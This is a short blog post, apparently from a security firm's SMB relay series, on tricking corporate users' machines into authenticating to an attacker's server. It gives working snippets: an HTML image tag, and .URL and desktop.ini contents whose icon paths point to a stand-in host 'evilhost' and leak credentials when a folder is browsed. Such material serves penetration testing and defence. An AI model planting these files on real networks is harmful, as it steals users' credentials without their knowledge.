SMBRelay Bible 5: SMBRelay attacks on corporate users

Today we will talk about client-side attacks. An attack of a network is a progressive action. Normally, we escalate our rights step-by-step from nothing to a domain administrator. Even casual unprivileged users can give us something interesting, for example access to some shared resources.But how can we get these user rights?

We can enforce users to authenticate on the controlled machine.

There are at least three main ways to interact with a user. They are very abstractive.

1) HTML and browser

We can use a social engineering or a MitM attack like DNS-poisoning to bring users to our web site with a following code: <img src=”\\evilhost\test”>

Their browsers will try to take the image from our server and give us their credentials. At the same time users will not know about such actions.

2) Crafted document

We can create a special document (like MS Excel file) and send it to users via e-mail or put it on some shared resources.When a user opens it, an Office program tries to connect to our server and give us user credentials. We will discuss it in details in the next blog post.

3) Windows Explorer and shared resources

If we have permission to write to some shared resources (for example a file server or a directory on terminal server), we can create a specified file. When somebody browses to a folder with the file, Explorer will try to connect to our server without any interaction from a user.

Such “specified file” can be:

  • .LNK – Windows Shortcut File. There is an ability to set an icon to the file. We can set a path of it to our server and Explorer will try to download it.
  • .URL – Internet Location File. Like LNK-file – setting an icon to a file, but URL is a primitive text file. So we write a following text and save it with the URL extension: [InternetShortcut] URL=http://erpscan.com/ IconIndex=3 IconFile=//evilhost/test
  • desktop.ini. The file is used for folder’s customization. There is some different fields (InfoTip, desktop.ini, LocalizedResourceName, IconFile (IconResource for Vista/7)) which can give us necessary links to our server. Fields’ influences on Explorer are different (you can read about it here). A little limitation is a folder with desktop.ini, which should be ‘system’. It can be set by ‘attrib +s folder_name’. But there are some pluses: desktop.ini are ‘hidden’ by default, and folders like “My Documents”, “Disc C(D, E,..)”, “Desktop” are ‘system’ by default. Here is a simple example of desktop.ini:[.ShellClassInfo] IconFile=//evilhost/test

Do you want more?

Subscribe me to your mailing list